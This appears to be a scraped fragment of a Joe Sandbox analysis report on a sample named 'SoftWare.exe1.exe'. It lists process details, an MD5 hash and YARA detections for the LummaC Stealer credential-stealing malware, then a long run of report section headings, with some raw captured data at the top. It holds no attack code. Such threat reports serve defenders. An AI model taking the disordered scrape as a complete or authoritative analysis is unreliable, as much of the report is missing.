f6 5d b9 b4 b7 1a 44 69 55 df a5 82 0a 29 22 79 4b c4 9b 7d f6 7e fe 22 e5 ff fa d1 d2 3a 8f 13 d3 a4 64 44 Data Ascii: \|;P}vTHcwW)eri>7G4i}`_mBmT.PWTZZdM}'HrQli@Pac=iTQsPK?iBsT.H+F3q5Jm.nW(KPmym%FP9hQl]DiU)"yK}~":dD

Target ID:	0
Start time:	08:39:59
Start date:	13/03/2025
Path:	C:\Users\user\Desktop\SoftWare.exe1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SoftWare.exe1.exe"
Imagebase:	0x7d0000
File size:	784'192 bytes
MD5 hash:	87A47A76F6FA81E316F77D1FBE07EEF1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.878081831.0000000001273000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:39:59
Start date:	13/03/2025
Path:	C:\Users\user\Desktop\SoftWare.exe1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SoftWare.exe1.exe"
Imagebase:	0x7d0000
File size:	784'192 bytes
MD5 hash:	87A47A76F6FA81E316F77D1FBE07EEF1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1010720289.00000000012DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.985320183.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.985030791.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.2134397080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1010456185.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1010752102.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.985152699.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SoftWare.exe1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
SoftWare.exe1.exe